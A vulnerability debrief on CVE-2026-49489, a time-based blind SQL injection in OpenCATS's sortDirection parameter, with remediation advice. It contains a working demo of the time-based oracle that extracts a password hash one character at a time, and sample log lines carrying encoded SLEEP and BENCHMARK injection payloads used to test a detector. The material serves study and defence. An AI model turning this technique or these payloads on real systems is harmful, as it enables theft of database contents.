PatchSiren

PatchSiren cyber security CVE debrief

CVE-2026-49489 OpenCATS CVE debrief

OpenCATS through version 0.9.7.4 contains a SQL injection vulnerability in the DataGrid component's sortDirection parameter. The flaw is in ajax/getDataGridPager.php, where an authenticated user can inject SQL through the sort direction and use time-based blind techniques to extract database contents one inference at a time. Exploitation requires a valid account but is remote and of low attack complexity.

Vendor
OpenCATS
Product
Unknown
CVSS
HIGH 8.4
CISA KEV
Not listed in stored evidence
Original CVE published
2026-05-31
Original CVE updated
2026-05-31
Advisory published
2026-05-31
Advisory updated
2026-05-31

Who should care

Organizations running the OpenCATS applicant tracking system at version 0.9.7.4 or earlier. The bar for exploitation is a single valid login with ordinary privileges (CVSS PR:L), so internet-facing instances and deployments with many user accounts, where one credential is more likely to be phished, reused or shared, are at highest risk. Security teams responsible for web application security and database protection should prioritize assessment.

Technical summary

The vulnerability resides in ajax/getDataGridPager.php, where the value of the sortDirection parameter is incorporated into a SQL query without validation. A sort direction ends up in an ORDER BY clause, and a bound parameter cannot supply ASC or DESC there, so the value is concatenated into the query text; without an allow-list check that concatenation is an injection point. An authenticated attacker can append expressions that make the database pause conditionally (MySQL functions such as SLEEP() or BENCHMARK()) and infer one bit of the database contents per request from the response latency. The CVSS 4.0 score of 8.4 (HIGH) breaks down as follows: for the vulnerable system, high confidentiality impact (VC:H), no integrity impact (VI:N) and low availability impact (VA:L, since the attacker's deliberate delays consume database time); for subsequent systems the same profile (SC:H/SI:N/SA:L), reflecting that data extracted from the OpenCATS database can be leveraged against other systems.
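The following is an added example, not OpenCATS code, showing the three things the summary above describes: a sort-direction value concatenated into ORDER BY, the time-based oracle that concatenation enables, and the allow-list fix. It stands in sqlite3 for MySQL and registers a Python-side SLEEP() to emulate MySQL's SLEEP(); the table names, columns, sample rows and the sample password hash (md5 of "password") are all constructed for the demo and are not OpenCATS's schema.

```python
"""Added example, not OpenCATS code: a sort-direction sink, the time-based
oracle it enables, and the allow-list fix.

Assumptions: an in-memory sqlite3 database stands in for MySQL, with a
Python-side SLEEP() registered to mimic MySQL's SLEEP(); the schema, the
sample rows and the sample hash are constructed for this demo.
"""
import sqlite3
import time

ALLOWED_DIRECTIONS = {"ASC", "DESC"}


def build_query_vulnerable(sort_direction: str) -> str:
    """The bug class: the direction is concatenated into ORDER BY unchecked."""
    return f"SELECT last_name FROM candidate ORDER BY last_name {sort_direction}"


def build_query_safe(sort_direction: str) -> str:
    """The fix: ASC/DESC cannot be bound as a parameter, so allow-list them."""
    direction = sort_direction.strip().upper()
    if direction not in ALLOWED_DIRECTIONS:
        raise ValueError(f"invalid sort direction: {sort_direction!r}")
    return f"SELECT last_name FROM candidate ORDER BY last_name {direction}"


def is_rejected(sort_direction: str) -> bool:
    """True if the hardened builder refuses the value."""
    try:
        build_query_safe(sort_direction)
    except ValueError:
        return True
    return False


def make_db() -> sqlite3.Connection:
    """Constructed sample schema; SLEEP() is registered to emulate MySQL's."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("SLEEP", 1, lambda seconds: time.sleep(seconds) or 0)
    conn.executescript("""
        CREATE TABLE candidate (candidate_id INTEGER PRIMARY KEY, last_name TEXT);
        INSERT INTO candidate VALUES (1, 'Lopez'), (2, 'Chen'), (3, 'Okafor');
        CREATE TABLE user (user_id INTEGER PRIMARY KEY, user_name TEXT, password TEXT);
        -- constructed sample row; md5('password') used as a stand-in hash
        INSERT INTO user VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return conn


def sorted_names(conn: sqlite3.Connection, sort_direction: str) -> list:
    """Runs the hardened query; shows the fix keeps the sort feature working."""
    return [row[0] for row in conn.execute(build_query_safe(sort_direction))]


def time_oracle(conn: sqlite3.Connection, condition: str, delay: float = 0.1) -> bool:
    """One time-based blind probe through the vulnerable builder.

    The payload keeps the query valid (it adds a second ORDER BY key) and
    sleeps only when `condition` is true; truth is inferred from latency.
    """
    payload = f"ASC, (CASE WHEN ({condition}) THEN SLEEP({delay}) ELSE 0 END)"
    start = time.monotonic()
    conn.execute(build_query_vulnerable(payload)).fetchall()
    return time.monotonic() - start >= delay / 2


def extract_hash_prefix(conn: sqlite3.Connection, length: int = 2) -> str:
    """Recovers the first `length` hex chars of the admin hash, one probe at a time."""
    recovered = ""
    for position in range(1, length + 1):
        for candidate in "0123456789abcdef":
            condition = (
                "substr((SELECT password FROM user WHERE user_name = 'admin'), "
                f"{position}, 1) = '{candidate}'"
            )
            if time_oracle(conn, condition):
                recovered += candidate
                break
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("hardened DESC order:", sorted_names(db, "DESC"))
    print("payload rejected by hardened builder:", is_rejected("ASC, (SELECT SLEEP(5))"))
    print("leaked via vulnerable builder:", extract_hash_prefix(db))
```

Two points worth noting from the run: the injected payload never breaks the query's syntax, so the application returns a normal page and only the latency leaks information; and the hardened builder still uses string formatting, which is fine precisely because the only strings that can reach it are the two keywords from the allow-list.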

Defensive priority

HIGH

Recommended defensive actions

  • Apply the fix from the OpenCATS project as soon as it is available; track GitHub Security Advisory GHSA-8mc8-5gw6-c7w4 for the fixed version. Until then, the minimal interim hardening is a strict allow-list check (ASC or DESC only) on sortDirection in ajax/getDataGridPager.php before the value reaches the query
  • Restrict network access to OpenCATS instances to authorized users and trusted networks (VPN or IP allow-listing), since a low-privilege account is all the attacker needs
  • Monitor web application logs for requests to ajax/getDataGridPager.php whose URL-decoded sortDirection is anything other than ASC or DESC, for SQL tokens in that value (SLEEP(, BENCHMARK(, CASE, comment sequences), and for latency spikes and high request rates on that endpoint: blind extraction needs many slow requests per recovered character
  • Use prepared statements for every value the database can bind; for query structure that cannot be bound (sort direction, column names), map the input onto a fixed allow-list rather than sanitizing it, in custom DataGrid code as elsewhere
  • Review the database account OpenCATS connects with and enforce least privilege: only the DML rights the application needs on its own schema, no FILE, SUPER or grant privileges, so that a successful injection cannot read the filesystem or pivot
  • Consider web application firewall (WAF) rules for SQL injection attempts against sortDirection, treated as defense in depth: time-based payloads can be rewritten (BENCHMARK instead of SLEEP, heavy subqueries instead of either) to slip past keyword rules
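As an added example for the log-monitoring action above (not PatchSiren or OpenCATS tooling), the check below runs over constructed access-log lines and flags the two signals time-based blind injection leaves on this endpoint: a decoded sortDirection outside the ASC/DESC allow-list (optionally carrying SQL tokens) and abnormal response time. It assumes Apache combined-format lines with a trailing response-time field in microseconds (LogFormat ending in %D); the log lines, addresses and payloads are constructed for the demo.

```python
"""Added example, not PatchSiren or OpenCATS tooling: flag the two signals
time-based blind injection leaves on ajax/getDataGridPager.php.

Assumptions: Apache combined log format with a trailing %D (microseconds)
field; the sample lines below are constructed for this demo.
"""
import re
from urllib.parse import parse_qs, urlsplit

TARGET_SCRIPT = "ajax/getDataGridPager.php"
ALLOWED_DIRECTIONS = {"ASC", "DESC"}
# Tokens that have no business in a sort direction; case-insensitive.
SUSPICIOUS_TOKENS = re.compile(r"sleep\s*\(|benchmark\s*\(|\bcase\b|\bif\s*\(|--|/\*|#", re.I)
SLOW_MICROSECONDS = 2_000_000  # 2 s; tune to the endpoint's normal latency

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" (?P<micros>\d+)$'
)

# Constructed sample log: one benign sort, two injection probes from the same
# client, an unrelated page, and a benign sort that happened to be slow.
SAMPLE_LOG = """\
10.0.0.5 - - [31/May/2026:10:00:01 +0000] "GET /opencats/ajax/getDataGridPager.php?sortBy=lastName&sortDirection=ASC HTTP/1.1" 200 512 "-" "Mozilla/5.0" 18422
10.0.0.9 - - [31/May/2026:10:00:07 +0000] "GET /opencats/ajax/getDataGridPager.php?sortBy=lastName&sortDirection=ASC%2C%28SELECT%20SLEEP%285%29%29 HTTP/1.1" 200 512 "-" "python-requests/2.31" 5012873
10.0.0.9 - - [31/May/2026:10:00:13 +0000] "GET /opencats/ajax/getDataGridPager.php?sortBy=lastName&sortDirection=ASC%2C%28CASE%20WHEN%20substr%28user%28%29%2C1%2C1%29%3D%27r%27%20THEN%20BENCHMARK%2830000000%2CSHA1%281%29%29%20ELSE%200%20END%29 HTTP/1.1" 200 512 "-" "python-requests/2.31" 3302211
10.0.0.5 - - [31/May/2026:10:00:20 +0000] "GET /opencats/index.php?m=candidates HTTP/1.1" 200 9120 "-" "Mozilla/5.0" 40110
10.0.0.7 - - [31/May/2026:10:00:25 +0000] "GET /opencats/ajax/getDataGridPager.php?sortBy=lastName&sortDirection=DESC HTTP/1.1" 200 512 "-" "Mozilla/5.0" 2400091
"""


def analyze(log_text: str) -> list:
    """Returns one finding per suspicious request: (ip, reasons, decoded sortDirection)."""
    findings = []
    for line in log_text.splitlines():
        match = LOG_LINE.match(line)
        if not match:
            continue  # unparseable line; in production, count these separately
        url = urlsplit(match["target"])
        if not url.path.endswith(TARGET_SCRIPT):
            continue
        # parse_qs percent-decodes, so matching happens on what PHP would see.
        params = parse_qs(url.query, keep_blank_values=True)
        direction = params.get("sortDirection", [""])[0]
        micros = int(match["micros"])
        reasons = []
        if direction.strip().upper() not in ALLOWED_DIRECTIONS:
            reasons.append("sortDirection outside allow-list")
        if SUSPICIOUS_TOKENS.search(direction):
            reasons.append("SQL tokens in sortDirection")
        if micros >= SLOW_MICROSECONDS:
            reasons.append(f"slow response ({micros / 1e6:.1f}s)")
        if reasons:
            findings.append((match["ip"], "; ".join(reasons), direction))
    return findings


if __name__ == "__main__":
    for ip, reasons, direction in analyze(SAMPLE_LOG):
        print(f"{ip}: {reasons} :: {direction!r}")
```

The allow-list violation is the high-confidence signal; latency alone is weak (the last sample line is a legitimate DESC that was merely slow), so it is reported separately rather than folded into one score, and a real deployment would additionally group findings per client and session to catch the request bursts that blind extraction produces.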

Evidence notes

CVE published 2026-05-31. CVSS 4.0 vector: AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:L/SC:H/SI:N/SA:L. CWE-89 (SQL Injection). Vendor attribution marked low-confidence with 'Unknown Vendor' in source; Packetstorm referenced as domain candidate. Multiple advisory sources confirm the issue, including GitHub Security Advisory, VulnCheck, and Exploit-DB.

Official resources

2026-05-31